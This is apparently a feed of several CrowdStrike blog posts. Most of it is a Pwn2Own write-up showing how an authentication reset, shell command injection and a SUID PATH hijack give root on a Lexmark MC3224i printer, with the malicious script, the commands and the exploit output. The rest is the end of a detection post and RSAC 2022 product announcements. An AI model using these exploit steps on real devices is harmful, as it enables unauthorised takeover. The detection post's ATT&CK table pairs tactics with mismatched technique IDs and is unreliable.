Figure 2. CrowdStrike Falcon detection and prevention of the POC attempting to inject the chrome.exe process (Click to enlarge)

As seen in Figure 2, the Falcon platform can immediately detect and prevent the POC from progressing by identifying any suspicious injection techniques on chrome.exe. The process is promptly killed, triggering an alert in the Falcon console.

Running the CyberArk POC through the MITRE ATT&CK® framework mapping reveals tactics and techniques commonly associated with identity-based attacks. The CrowdStrike Falcon platform provides defenders with actionable information on a given technique so that they can immediately take mitigation actions by identifying and blocking the use of stolen credentials and enforcing MFA. By successfully identifying and blocking these chokepoint techniques, defenders can disrupt the adversary and shut down the identity-based attack.

Tactic Description
Execution Native API: T1539
Credential Access Steal Web Session Cookie: T1111
Multi-Factor Authentication Interception: T1106

CrowdStrike Platform Protects from Modern Identity-Based Attacks

Many breaches are now identity-driven. Credential theft, credential hopping, stealing browser cookies for bypassing MFA or credential theft using various tools are just some of the tactics and techniques used in modern identity-based attacks. 

With recent examples of identity-based attacks involving sophisticated adversaries stealing Chrome browser cookies from a user that had already passed an MFA challenge, organizations need a unified approach to security that also enforces Zero Trust.

CrowdStrike’s identity protection capabilities recently shut down MITRE ATT&CK adversaries during the latest adversary emulation, stopping the test before it could even start. Coupled with the Falcon sensor’s comprehensive IOAs and machine learning capabilities, as well as Falcon’s unified cloud-native automated orchestration and threat intelligence, the Falcon platform can equip defenders with the right data at the right time to stop breaches.

Additional Resources

For the Common Good: How to Compromise a Printer in Three Simple Steps

In August 2021, ZDI announced Pwn2Own Austin 2021, a security contest focusing on phones, printers, NAS devices and smart speakers, among other things. The Pwn2Own contest encourages security researchers to demonstrate remote zero-day exploits against a list of specified devices. If successful, the researchers are rewarded with a cash prize, and the leveraged vulnerabilities are responsibly disclosed to the respective vendors so they can improve the security of their products.

After reviewing the list of devices, we decided to target the Cisco RV340 router and the Lexmark MC3224i printer, and we managed to identify several vulnerabilities in both of them. Fortunately, we were luckier than last year and were able to participate in the contest for the first time. By successfully exploiting both devices, we won $20,000 USD, which CrowdStrike donated to several charitable organizations chosen by our researchers.

In this blog post, we outline the vulnerabilities we discovered and used to compromise the Lexmark printer.

Overview

Product Lexmark MC3224
Affected Firmware Versions
(without claim for completeness)
CXLBL.075.272 (2021-07-29)
CXLBL.075.281 (2021-10-14)
Fixed Firmware Version CXLBL.076.294 (CVE-2021-44735)

Note: Users must implement a workaround to address CVE-2021-44736, see Lexmark Security Alert

CVE CVE-2021-44735 (Shell Command Injection)
CVE-2021-44736 (Authentication Reset)
Root Causes Authentication Bypass, Shell Command Injection, Insecure SUID Binary
Impact Unauthenticated Remote Code Execution (RCE) as root
Researchers Hanno Heinrichs, Lukas Kupczyk
Lexmark Resources https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44735.pdf
https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44736.pdf

Step #1: Increasing Attack Surface via Authentication Reset

Before we could start our analysis, we first had to obtain a copy of the firmware. It quickly turned out that the firmware is shipped as an .fls file in a custom binary format containing encrypted data. Luckily, a detailed writeup on the encryption scheme had been published in September 2020. While the writeup did not include code or cryptographic keys, it was elaborate enough that we were able to quickly reproduce it and write our own decrypter. With our firmware decryption tool at hand, we were finally able to peek into the firmware.

It was assumed that the printer would be in a default configuration during the contest and that the setup wizard on the printer had been completed. Thus, we expected the administrator password to be set to an unknown value. In this state, unauthenticated users can still trigger a vast amount of actions through the web interface. One of these is Sanitize all information on nonvolatile memory. It can be found under Settings -> Device -> Maintenance. There are several options to choose from when performing that action:

[x] Sanitize all information on nonvolatile memory
  (x) Start initial setup wizard
  ( ) Leave printer offline
[x] Erase all printer and network settings
[x] Erase all shortcuts and shortcut settings

[Start] [Reset]

If the checkboxes are ticked as shown, the process can be initiated through the Start button. The printer’s non-volatile memory will be cleared and a reboot is initiated. This process takes approximately two minutes. Afterward, unauthenticated users can access all functions through the web interface.

Step #2: Shell Command Injection

After resetting the nvram as outlined in the previous section, the CGI script https://target/cgi-bin/sniffcapture_post becomes accessible without authentication. It was previously discovered by browsing the decrypted firmware and is located in the directory /usr/share/web/cgi-bin.

At the beginning of the script, the supplied POST body is stored in the variable data. Afterward, several other variables such as interface, dest, path and filter are extracted and populated from that data by using sed:

read data

remove=${data/*-r*/1}
if [ "x${remove}" != "x1" ]; then
    remove=0
fi
interface=$(echo ${data} | sed -n 's|^.*-i[[:space:]]\([^[:space:]]\+\).*$|\1|p')
dest=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
path=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
method="startSniffer"
auto=0
if [ "x${dest}" = "x/dev/null" ]; then
    method="stopSniffer"
elif [ "x${dest}" = "x/usr/bin" ]; then
    auto=1
fi
filter=$(echo ${data} | sed -n 's|^.*-F[[:space:]]\+\(["]\)\(.*\)\1.*$|\2|p')
args="-i ${interface} -f ${dest}/sniff_control.pcap"

The variable filter is determined by a quoted string following the value -F specified in the POST body. As shown below, it is later embedded into the args variable in case it has been specified along with an interface:

fmt=""
args=""
if [ ${remove} -ne 0 ]; then
    fmt="${fmt}b"
    args="${args} remove 1"
fi
if [ -n "${interface}" ]; then
    fmt="${fmt}s"
    args="${args} interface ${interface}"
    if [ -n "${filter}" ]; then
        fmt="${fmt}s"
        args="${args} filter \"${filter}\""
    fi
    if [ ${auto} -ne 0 ]; then
        fmt="${fmt}b"
        args="${args} auto 1"
    else
        fmt="${fmt}s"
        args="${args} dest ${dest}"
    fi
fi
[...]

At the end of the script, the resulting args value is used in an eval statement:

[...]
resp=""
if [ -n "${fmt}" ]; then
    resp=$(eval rob call system.sniffer ${method} "{${fmt}}" ${args:1} 2>/dev/null)
    submitted=1
[...]

By controlling the filter variable, attackers are therefore able to inject further shell commands and gain access to the printer as uid=985(httpd), which is the user that the web server is executed as.

Step #3: Privilege Escalation

The printer ships a custom root-owned SUID binary called collect-selogs-wrapper:

# ls -la usr/bin/collect-selogs-wrapper
-rwsr-xr-x. 1 root root 7324 Jun 14 15:46 usr/bin/collect-selogs-wrapper

In its main() function, the effective user ID (0) is retrieved and the process’s real user ID is set to that value. Afterward, the shell script /usr/bin/collect-selogs.sh is executed:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __uid_t euid; // r0

  euid = geteuid();
  if ( setuid(euid) )
    perror("setuid");
  return execv("/usr/bin/collect-selogs.sh", (char *const *)argv);
}

Effectively, the shell script is executed as root with UID=EUID, and therefore the shell does not drop privileges. Furthermore, argv[] of the SUID binary is passed to the shell script. As the environment variables are also retained across the execv() call, an attacker is able to specify a malicious $PATH value. Any command inside the shell script that is not referenced by its absolute path can thereby be detoured by the attacker.

The first opportunity for such an attack is the invocation of systemd-cat inside sd_journal_print():

# cat usr/bin/collect-selogs.sh
#!/bin/sh
# Collects fwdebug from the current state plus the last 3 fwdebug files from
# previous auto-collections. The collected files will be archived and compressed
# to the requested output directory or to the standard output if the output
# directory is not specified.

sd_journal_print() {
    systemd-cat -t collect-selogs echo "[email protected]"
}

sd_journal_print "Start! params: '[email protected]'"

[...]

The /dev/shm directory can be used to prepare a malicious version of systemd-cat:

$ cat /dev/shm/systemd-cat
#!/bin/sh
mount -o remount,suid /dev/shm
cp /usr/bin/python3 /dev/shm
chmod +s /dev/shm/python3
$ chmod +x /dev/shm/systemd-cat

This script remounts /dev/shm with the suid flag so that SUID binaries can be executed from it. It then copies the system’s Python interpreter to the same directory and enables the SUID bit on it. The malicious systemd-cat copy can be executed as root by invoking the setuid collect-setlogs-wrapper binary like this:

$ PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper

The $PATH environment variable is prepended with the /dev/shm directory that hosts the malicious systemd-cat copy. After executing the command, a root-owned SUID-enabled copy of the Python interpreter is located in /dev/shm:

[email protected]:~# ls -la /dev/shm
drwxrwxrwt    2 root     root           100 Oct 29 09:33 .
drwxr-xr-x   13 root     root          5160 Oct 29 09:31 ..
-rwsr-sr-x    1 root     httpd         8256 Oct 29 09:33 python3
-rw-------    1 nobody   nogroup         16 Oct 29 09:31 sem.netapps.rawprint
-rwxr-xr-x    1 httpd    httpd           96 Oct 29 09:33 systemd-cat

The idea behind this technique is to establish a simple way of escalating privileges without having to exploit the initial collect_selogs_wrapper SUID again. We did not use the Bash binary for this, as the version shipped with the printer seems to ignore the -p flag when running with UID!=EUID.

Exploit

An exploit combining the three vulnerabilities to gain unauthenticated code execution as root  has been implemented as a Python script. First, the exploit tries to determine whether the printer has a login password set (i.e., setup wizard has been completed) or it is password-less (i.e., authentication reset already executed earlier or setup wizard not yet completed). Depending on the result, it decides whether the non-volatile memory reset is required.

If the non-volatile memory reset is triggered, the exploit waits for the printer to finish rebooting. Afterward, it continues with the shell command injection step and escalation of privileges. The privileged access is then used to start an OpenSSH daemon on the printer. To finish, the exploit establishes an interactive SSH session with the printer and hands control over to the user. An example run of the exploit in a testing environment follows:

$ ./mc3224i_exploit.py https://10.64.23.20/ sshd
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM',        
    'LOGIN_METHODS_WITH_CREDS']
[*] Device IS password protected, auth bypass required
[*] Erasing nvram...
[+] Success! HTTP status: 200, rc=1
[*] Waiting for printer to reboot, sleeping 5 seconds...
[*] Checking status...
xxxxxxxxxxxxxxxxxxxxxxx!
[+] Reboot finished
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM']
[*] Device IS NOT password protected
[+] Authentication bypass done
[*] Attempting to escalate privileges...
[*] Executing command (root? False):
    echo -e '#!/bin/sh\\n
    mount -o remount,suid /dev/shm\\n
    cp /usr/bin/python3 /dev/shm\\nchmod +s /dev/shm/python3' >
    /dev/shm/systemd-cat; chmod +x /dev/shm/systemd-cat
[+] HTTP status: 200
[*] Executing command (root? False): PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper
[+] request timed out, that’s what we expect
[+] SUID Python interpreter should be created
[*] Attempting to enable SSH daemon...
[*] Executing command (root? True):
sed -Ee 's/(RSAAuthentication|UsePrivilegeSeparation|UseLogin)/#\\1/g'
    -e 's/AllowUsers guest/AllowUsers root guest/'
    /etc/ssh/sshd_config_perf > /tmp/sshconf;
    mkdir /var/run/sshd;
    iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT;
    nohup /usr/sbin/sshd -f /tmp/sshconf &
[+] HTTP status: 200
[+] SSH daemon should be running
[*] Trying to call ssh... ('ssh', '-i', '/tmp/tmpd2vc5a2u', '[email protected]')
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)

Summary

In this blog, we described a number of vulnerabilities that can be exploited from the local network to bypass authentication, execute arbitrary shell commands, and elevate privileges on a Lexmark MC3224i printer. The research started as an experiment after the announcement of the Pwn2Own Austin 2021. The team enjoyed the challenge, as well as participating in Pwn2Own for the first time, and we welcome your feedback. We’d also like to invite you to read about the other device we successfully targeted during Pwn2Own Austin 2021, the Cisco RV340 router.

Additional Resources

RSAC 2022: CrowdStrike Delivers Protection that Powers Productivity

6 June 2022 at 07:45

The theme of RSA Conference 2022 succinctly captures the aftermath of the disruption we’ve all experienced over the last couple of years: Transform.  

Customers continue to transform and accelerate digital initiatives in response to the massive economic and technological shifts driven by the COVID-19 pandemic. The shift to the cloud, embrace of DevOps and broad adoption of software-as-a-service (SaaS) technologies have dramatically expanded the attack surface and made companies more vulnerable than ever. 

In response to these widespread changes, adversaries continue to transform as well, refining tactics and tradecraft to exploit vulnerabilities and misconfigurations across digital infrastructure. As a result, attacks have become more sophisticated, brazen and pernicious. The CrowdStrike 2022 Global Threat Report documented many of these adversarial shifts, including the targeting of cloud service providers to exploit trusted relationships, the broad weaponization of vulnerabilities and architectural limitations in legacy systems, and the growth of devastating big game hunting (BGH) ransomware attacks.

These trends have transformed our understanding of security as well. Security has moved into the spotlight and emerged as a top agenda item for boards of directors as the risk and impact of cyberattacks has become more consequential. Organizational leaders are increasingly seeking input from CISOs who understand business operations to help strengthen cyber resiliency plans and maintain business continuity. 

As I’ve noted many times, these massive shifts require a security technology transformation as well. The complexity of today’s IT environment and security stack requires a cloud-native security platform that breaks down silos and delivers the speed and scale required to stay ahead of adversaries and stop breaches. It requires a platform that can harness data from across the organization to protect your most critical assets and deliver an adversary-focused view of your organizational risk posture. Most of all, it requires a platform that you can trust to protect you on what could be your worst day.

Modern security should not only protect your organization, it should power your productivity as well. It needs to dynamically adapt security postures as environments change faster than adversaries can react and attack, without impacting IT. 

That’s why I’m excited to announce that this week at RSAC, CrowdStrike is unveiling major new innovations to the CrowdStrike Falcon® platform that meet the urgency of the moment and keep customers ahead of the adversary.

Introducing the CrowdStrike Asset Graph: Observability Across IT Assets and the Attack Surface 

When we introduced CrowdStrike Threat Graph®, we fundamentally changed how the security industry ingested, indexed and actioned massive amounts of security data to automatically prevent threats in real time. This is an architectural linchpin of our “collect data once, reuse it multiple times” approach to solving the biggest problems that customers face.  

With the introduction of CrowdStrike Asset Graph, we’re once again leading the industry forward by delivering observability data that provides a bridge to IT operations and security. CrowdStrike Asset Graph solves one of the most complex customer problems today: identifying and showing the interconnected relationship between the hundreds of millions of assets, identities and configurations accurately across all systems including cloud, on-premises, mobile, Internet of Things (IoT) and more, and connecting them together in a graph form. Ingesting this telemetry into the Falcon platform will provide organizations with critical productivity insight into asset performance, uptime and more, and empower security teams to understand how external activity like adversary attacks, patching and configuration changes alter the attack surface.

The combination of our groundbreaking graph technologies creates a powerful, seamless and distributed data fabric, interconnected into a single cloud — the CrowdStrike Security Cloud — that powers the Falcon platform and our industry-leading solutions. 

The addition of Asset Graph will enable new Falcon modules and features built on top of the platform. The first Falcon module to use Asset Graph is Falcon Discover™ Security Hygiene, providing customers with real-time visibility into the devices, users and applications on the network, and a deeper understanding of the relationships between these assets.

For more on Asset Graph, you can read this companion blog post by our CPO, Amol Kulkarni. 

Driving Innovations in Extended Detection and Response (XDR) 

At CrowdStrike, XDR is not just a rebranding opportunity or simply the integration of data into a single console. XDR is the natural evolution of endpoint detection and response (EDR) — it must start with EDR technology and build on that foundation. XDR needs to deliver the most relevant telemetry from systems and applications from across the entire IT security ecosystem to accelerate visibility, detection and response actions beyond the endpoint. It needs to power security teams to stop breaches — faster. 

That is why I’m excited to announce that CrowdStrike has expanded the ground breaking CrowdXDR Alliance to include key strategic partners across web and email security, identity and access management, and network detection and response. With the CrowdXDR Alliance, we’re creating a standardized schema for data sharing to enrich XDR detections with the most high-value telemetry data from leading security vendors. We also unveiled powerful new capabilities that deliver new levels of automation to speed threat detection and response efforts. 

Unveiling Humio for Falcon: Do More with Data 

Cybersecurity is fundamentally a data problem. To stay ahead of adversaries and uncover and detect potential threats, security teams need to be able to rapidly analyze and act on real-time and historical data in their environment. Organizations want to be able to log and action more data, but existing solutions prove cost prohibitive and fail to deliver the speed and scale required to meet the moment. 

Today, CrowdStrike is empowering customers to do more with their data with the introduction of Humio for Falcon, a new capability that extends data retention of CrowdStrike Falcon telemetry for one year or longer, enhancing threat analytics, threat hunting abilities and compliance requirements. The new capability gives security teams the ability to store security and IT telemetry from the Falcon platform, enriched and contextualized across endpoints, workloads and identities, to address the challenge of operationalizing massive volumes of data.

For more on the exciting innovations we’re unveiling for Falcon XDR and Humio for Falcon, you can read this companion blog post by our CTO, Michael Sentonas

Join CrowdStrike at RSAC 2022

After being remote for most events for the past two years, it’s incredibly exciting to be able to see customers, partners and the security community in person again. If you’re attending RSAC this year, we encourage you to stop by booth N-6155 for a conversation, live demos or to participate in our adversary training.

CrowdStrike will also be hosting a number of keynotes and presentations with a focus on the adversary and how they’re looking to exploit cloud technology and customer environments.  

Here are a few things to look forward to this week:

KEYNOTE: Hacking Exposed: Next-Generation Tactics, Techniques and Procedures

  • Date: Thursday, June 9, 9:40-10:30 a.m. PT 
  • CrowdStrike CTO Michael Sentonas will join me on stage to demonstrate how adversaries seek to exploit cloud environments by breaking down cr8escape, a new vulnerability discovered by the CrowdStrike Cloud Threat Research team that could allow an attacker to escape from a Kubernetes container, gain root access to the host and be able to move anywhere in the cluster. 

SESSION: Confessions of a Sandbox: How AI Is Disrupting Automated Threat Analysis

  • Date: Tuesday, June 7, 1:15-2:05 p.m. PT
  • Join CrowdStrikers Marian Radu (Senior Director, Data Science) and Liviu Arsene (Director of Threat Research and Reporting) for a discussion on the role of artificial intelligence (AI) in automating threat analysis. 

SESSION: Extend EDR Visibility by Logging Everything: Demo with Free Integrations

  • Date: Thursday, June 9, 10:50-11:40 a.m. PT
  • Adam Hogan, CrowdStrike’s SE Director for Humio, will show why log management can be a powerful tool for investigating incidents. 

Additional Resources

RSAC 2022: CrowdStrike Innovations that Prioritize Data

6 June 2022 at 07:42

It’s been several years since we’ve been at the RSA Conference in person and having face-to-face interaction is invaluable — the energy here is palpable. The theme for RSAC 2022 is “transform.” It’s a fitting theme given how much has changed in the cybersecurity world in the last few years. The move to support remote workers, the massive adoption of cloud workloads, and the proliferation of devices and assets connected to corporate networks have merged to create a massive attack surface that adversaries seek to exploit. These broad trends have also generated vast amounts of data that create unique opportunities for organizations to gain deeper observability and understanding of how their environments operate.   

At CrowdStrike, we embrace the concept of transformation and continue to build technology that transforms the way security is delivered and experienced by customers. We want to empower our customers to use data to make actionable decisions faster. In the current landscape, understanding data and quickly acting on it is the difference between being breached or not. 

This drive for innovation and transformation is demonstrated in two big announcements that CrowdStrike is making today at RSAC. The first includes new automation capabilities and deeper data integrations in Falcon XDR to supercharge threat detection, investigations, response and hunting. The second announcement is Humio for Falcon, a new capability that extends data retention of CrowdStrike Falcon® telemetry for one year or longer, enhancing threat analytics, threat hunting abilities and compliance requirements. 

Expanding Our Vision of CrowdXDR Alliance with New Partners

It’s important to note that third-party data ingestion is critical for driving outcomes in extended detection and response (XDR). The data ingestion process can be complex — varying by vendor platform and dependent on each customer’s environment configurations. This is why CrowdStrike continues to expand third-party support for the CrowdXDR Alliance, which is delivering a standardized schema for data sharing to enrich XDR detections. 

This morning, CrowdStrike announced several exciting developments that further solidify our position as a leader in XDR. The first is the expansion of our CrowdXDR Alliance to include key strategic partners, including:

  • Menlo Security: web and email security
  • Ping Identity: identity and access management
  • Vectra: network detection and response

Together, the CrowdXDR Alliance will extend the capabilities of Falcon XDR to accelerate triage and investigation for our customers, and automate responses across endpoint, cloud, identity management, network and web security. 

By extending visibility and control into identities, network, cloud, email and applications, customers will have the flexibility and extension options needed based on their security technology stack. These new partnerships will also empower security teams to identify and hunt for threats at an increased speed and scale, all while providing powerful and relevant insights using data sources that extend the power of endpoint detection and response (EDR) beyond endpoints.

Falcon XDR Automates Incident Response for Faster Detection and Remediation

Additionally, we have invested in our Falcon XDR tech for organizations seeking a native approach by adding new capabilities that speed up detections, including:

  • Falcon Fusion workflows based on XDR detections: Our customers can now automate incident response workflows with Falcon Fusion, CrowdStrike’s security orchestration, automation and response (SOAR) framework, which is fully integrated with Falcon XDR. Falcon Fusion now automates numerous workflows directly from a Falcon XDR detection, including:
    • Ticket creation through ServiceNow, a CrowdXDR Alliance partner. 
    • Notifications through email, Slack or webhook. 
    • Incident details from status changes to team assignments and comments. 
  • XDR detections event timeline: We’ve accelerated triage and investigation with a timeline view that displays key events of a detection in chronological order to easily understand how activity progressed. 
  • Graph visualization of custom XDR detections: Customers can create custom XDR detections from queries they’ve written to hunt for threats in their environment. Falcon XDR graph explorer visualizes how the events and entities in a custom XDR detection are related, enabling security analysts to rapidly orient and explore connections in cross-domain data.

Providing immediate customer value and helping to solve their biggest security problems is at the heart of everything we do at CrowdStrike. Our tech has always aligned with this vision down to its fundamental foundation. One of these problems, customers have told us, is a struggle to make sense of the sheer amount and complexity of log data and telemetry. 

The CrowdXDR Alliance is critical for this very reason: so we can empower customers to effectively and elegantly enrich the data that we have with other third parties, creating a detailed storyline on how an attack develops and progresses from detection to remediation. We have continued to invest in enriching endpoint data by adding visibility and telemetry from all workloads, regardless of where they are: on premises, in the cloud or deployed in a container.

As we know well by now, good XDR starts with good EDR, and CrowdStrike’s EDR is unparalleled in the market. Unlike other vendors that claim to “be XDR” without providing any framework for it nor any semblance of a robust EDR strategy, CrowdStrike’s strategy has been clear from the beginning: bring the right information into the Falcon platform at the right time to enrich our EDR telemetry. This allows us to make actionable decisions about real-world scenarios, which is incredibly impactful for security operations teams and CISOs who live and die by the data. 

Data Storage and Management at Scale: Humio for Falcon

We also announced a new capability today, Humio for Falcon, which enables security teams to have  an incredibly cost-effective way to store and manage data. Humio for Falcon will enable customers to have access to extended data retention for one year or longer with CrowdStrike Falcon’s enriched security telemetry. Security teams have been asking for contextual data to provide timely and valuable insights across their IT environments. Now, Humio for Falcon will not only help organizations fulfill compliance requirements but also inform threat analytics and threat hunting abilities.

With Humio for Falcon, customers now have a cost-effective and easy way to search for years’ worth of their EDR data, which is revolutionary in its own right. We’ve heard time and again from customers using competing products that they’re simply paying too much for this type of service and they need to be able to log more data, not less. This is ever-more timely in the wake of widespread issues, such as Log4Shell. 

In fact, in the wake of Log4Shell, customers around the world told us that of all the technologies they had in their environment, the de facto go-to technology was the Falcon platform in conjunction with our Humio technology. With this winning combination, customers were able to do a quick sweep of their cyber environment to look for Log4Shell issues and obtain a view of a year’s worth of data within seconds. We know these cyber issues affect an organization’s bottom line, so every second counts, and that’s the power of Humio for Falcon.

Humio for Falcon brings together the world’s most advanced security platform in CrowdStrike Falcon, with our Humio offering, which expands our XDR capabilities by ingesting and correlating data from any log, application or feed to deliver actionable insights and real-time protection. In other words, customers receive data ingestion that’s faster, more flexible and less costly than anything on the market, while they get deep, contextual and faster analytics on massive amounts of log data. With longer data retention, security teams can see potential threats faster than ever within their environments and conduct lightning-fast searches on log data. That speed enables threat hunting and troubleshooting at an unprecedented scale.

Customers can feed Falcon platform data directly into Humio with the Falcon Data Replicator (FDR). This data is instantly searchable and can be cross-referenced with other incumbent data sources in Humio. By analyzing multiple log sources as part of their security detections, customers can better define and narrow the scope of detections to match exact adversary techniques and behaviors, resulting in fewer false positives. Other benefits include:

  • Reduced cost with longer data retention: With Humio’s scalable storage and advanced compression techniques, customers can keep Falcon platform data in Humio for one year or longer. This wealth of historical data gives customers the confidence they need for complete and accurate investigations, which allows faster, focused and more cost-effective detection and remediation.
  • Fast and custom search: Humio’s feature-rich query language and index-free search times allow customers to ask any questions of their Falcon platform data and get immediate answers with new UI dashboards. Customers can create specific research that meets an exact business scenario and generate new insights from their Falcon platform data. 

CrowdStrike’s fundamental technology advantage is that we are relentlessly customer-obsessed. We want to solve the hard problems that are of the most importance to our customers and our tech stack delivers on the promise of stopping breaches. We have created a once-in-a-generation cloud platform for cybersecurity that solves a growing list of customer needs, all from a single agent, providing durable growth for many years to come. 

Join CrowdStrike at RSAC 

If you’re attending RSAC this year, we encourage you to stop by booth N-6155 for a conversation, live demos or to participate in our adversary training.

CrowdStrike will also be hosting a number of keynotes and presentations with a focus on the adversary and how they’re looking to exploit cloud technology and customer environments.  

Here are a few things to look forward to this week:

KEYNOTE: Hacking Exposed: Next-Generation Tactics, Techniques and Procedures

  • Date: Thursday, June 9, 9:40-10:30 a.m. PT 
  • I will be joined on stage by CrowdStrike CEO George Kurtz to demonstrate how adversaries seek to exploit cloud environments by breaking down cr8escape, a new vulnerability discovered by the CrowdStrike Cloud Threat Research team that could allow an attacker to escape from a Kubernetes container, gain root access to the host and be able to move anywhere in the cluster. 

SESSION: Confessions of a Sandbox: How AI Is Disrupting Automated Threat Analysis

  • Date: Tuesday, June 7, 1:15-2:05 p.m. PT
  • Join CrowdStrikers Marian Radu (Senior Director, Data Science) and Liviu Arsene (Director of Threat Research and Reporting) for a discussion on the role of artificial intelligence (AI) in automating threat analysis. 

SESSION: Extend EDR Visibility by Logging Everything: Demo with Free Integrations

  • Date: Thursday, June 9, 10:50-11:40 a.m. PT
  • Adam Hogan, CrowdStrike’s SE Director for Humio, will show why log management can be a powerful tool for investigating incidents. 

Additional Resources

RSAC 2022: Introducing CrowdStrike Asset Graph — the Path to Proactive Security Posture Management

6 June 2022 at 07:23

Driven by all the new technologies being adopted and the move to the cloud, the number and types of assets an organization has to manage increased nearly fourfold over the last 10 years. As a result, organizations are at risk to adversaries, who continually conduct reconnaissance to identify, target and exploit soft targets and vulnerabilities. The proliferation of assets also creates an untenable situation for IT to minimize service disruption as asset configurations are changed and patches are applied. Gaining visibility and being able to manage both known and unknown assets is critical to maintaining proper security hygiene and a proactive security posture, but remains an unsolved challenge for nearly every organization. 

The scale of the challenge is immense: hundreds of thousands of assets and devices, with hundreds of thousands of accounts logging into those workloads, with thousands of applications running. For true cloud-based solutions, this problem becomes exponentially harder with hundreds of millions of assets, hundreds of millions of users, running tens of thousands of applications.

One of the biggest obstacles today in operationalizing security posture management is the lack of understanding of the cascading impact of any configuration change. For too long, security posture management tools have focused on the security impact of proposed mitigations, but are unable to understand the operational impact such a mitigation may have on the organization. This creates a gap between security and IT teams, resulting in huge hurdles for implementing any change. 

Let’s take a simple example of mitigating a vulnerability in a deployed product. First, it is almost impossible for any organization to even keep track of published vulnerabilities and associated patches due to the pace at which vulnerabilities are being discovered. Second, even if an organization knows about a mitigation, they cannot deploy it fast enough before exploits are available in the wild. That is because of the aforementioned lack of insight into the ITOps impact of any patch. The result is an ever-increasing attack surface and IT and security teams that are often at loggerheads.

Gaining a single, unified, 360-degree view of assets, identities and configurations across all systems — including cloud, on-premises, mobile, IoT and more — and understanding how each of these assets interacts with each other, provides a bridge to IT and security operations. 

For security teams, this level of dynamic visibility empowers them to discover and catalog every asset and its interconnected relationship to better understand the configurations, vulnerabilities and exposures that an adversary might try to exploit. And IT operations can better manage, maintain and track assets across the organization to better minimize service disruption, ensure system uptime and support other critical IT projects. 

CrowdStrike has always focused on solving the hard problem first by developing innovative, scalable solutions, and we are now applying the same approach to this area of security posture management. That’s why I’m so excited to announce that CrowdStrike today unveiled the CrowdStrike Asset Graph, a new graph database underpinning the CrowdStrike Falcon® platform. 

CrowdStrike Asset Graph dynamically monitors and tracks the complex interactions among assets, providing a single holistic view of the risks those assets pose. Asset Graph provides graph visualizations of the relationships among all assets such as devices, users, accounts, applications, cloud workloads and operations technology (OT), along with the rich context necessary for proper security hygiene and proactive security posture management to reduce risk in their organizations — without impacting IT.

Asset Graph: Powering the Falcon Platform and the Future of IT SecOps

CrowdStrike has once again done the hard, architectural work up front to deliver superior protection, performance and value from the Falcon platform. 

Asset resolution — the merging of small pieces of information from various sources and systems into a single view of the asset — continues to be an unmet challenge in the industry. For instance, one system in an IT environment may register a device by IP address, while another system registers it by user name. This problem grows more complex depending on how and where the asset is used (internal networks, on cloud networks, etc.) and the number of data sources used to track inventory. According to ESG, nearly one-third (32%) of organizations utilize 10 or more data sources to track and inventory their assets for security purposes.

This makes it incredibly difficult for organizations to gain a unified view of their assets — and conversely, makes it difficult to ensure that disparate assets are not conflated with a different asset of a similar name from another system. The data exists to make these distinctions, but resolving assets across myriad systems has proved elusive, until now.

Figure 1. CrowdStrike Asset Graph shows every entity (device, IoT, identities, etc.) on a customer network and how they all interact. This insight helps organizations make better decisions — from security to IT performance, utilization, capacity, license management and more — to proactively protect and manage their IT environment. (Click to enlarge)

The CrowdStrike Falcon platform was purpose-built with a cloud-native architecture to harness vast amounts of high-fidelity security and enterprise data, and deliver solutions through a single, lightweight agent to keep customers ahead of today’s sophisticated adversaries.  

CrowdStrike’s groundbreaking graph technologies, beginning with the company’s renowned Threat Graph®, help form a powerful, seamless and distributed data fabric, interconnected into a single cloud — the CrowdStrike Security Cloud — that powers the Falcon platform and CrowdStrike’s industry-leading solutions. 

Using a combination of artificial intelligence (AI) and behavioral pattern-matching techniques to correlate and contextualize information in the vast data fabric, CrowdStrike’s graphs create a “collect data once, reuse it multiple times” approach to solving the biggest problems customers face. With the introduction of Asset Graph, CrowdStrike is applying this same approach to solving customers’ hardest, unmet challenges with an eye to proactive security, as well as unprecedented IT visibility and risk management.  

The three highly advanced graph technologies underpinning the Falcon platform now include:

  • Threat Graph: CrowdStrike’s industry-defining Threat Graph takes trillions of security data points from millions of sensors, enriched by threat intelligence data and third-party sources, to identify and link threat activity together to provide full visibility of attacks and automatically prevent threats in real time across CrowdStrike’s global customer base. 
  • Intel Graph: By analyzing and correlating massive amounts of data on adversaries, their victims and their tools, Intel Graph provides unrivaled insights into the shifts in tactics and techniques, powering CrowdStrike’s adversary-focused approach with world-class threat intelligence. 
  • Asset Graph: With this release, CrowdStrike is solving one of the most complex customer problems today: identifying assets, identities and configurations accurately across all systems including cloud, on-premises, mobile, IoT and more, and connecting them together in a graph form. Unifying and contextualizing this information will lead to powerful new solutions that transform how organizations enforce security hygiene and dynamically manage their security posture. 

Falcon Discover 2.0: The First Module Powered by Asset Graph

CrowdStrike Asset Graph will enable new Falcon modules and features built on top of it to define, monitor and explore the relationships among assets within an organization. The first Falcon module to use Asset Graph is Falcon Discover™, CrowdStrike’s security hygiene solution, which includes the following enhancements: 

  • Newly enhanced dashboards, highly customizable filters and sharing options: IT teams can tailor their experience of Asset Graph’s map visualization and powerful search capabilities, all presented conveniently within the Falcon Discover console. 
  • New third-party data integration with ServiceNow: By combining a ServiceNow integration with Asset Graph and Falcon Discover, IT teams gain another layer of asset visibility around devices in a single console, providing enhanced monitoring over unmanaged and unsupported assets.

Manage Risk by Thinking Like an Adversary

CrowdStrike has long advocated for an adversary-focused approach to security. This means staying ahead of shifting adversary tradecraft and tactics so you know how they’ll come after you. It also means having deep visibility across your critical assets and technology environment to understand where they’ll come after you as well. 

The introduction of Asset Graph will enable organizations to gain a much deeper understanding of their complete technology environment and how it interacts, more accurately assess the risk posture of their assets, and move to proactively adapt their security posture to defend against today’s adversaries without disrupting IT operations. 

Additional Resources

Detecting Poisoned Python Packages: CTX and PHPass

3 June 2022 at 08:16

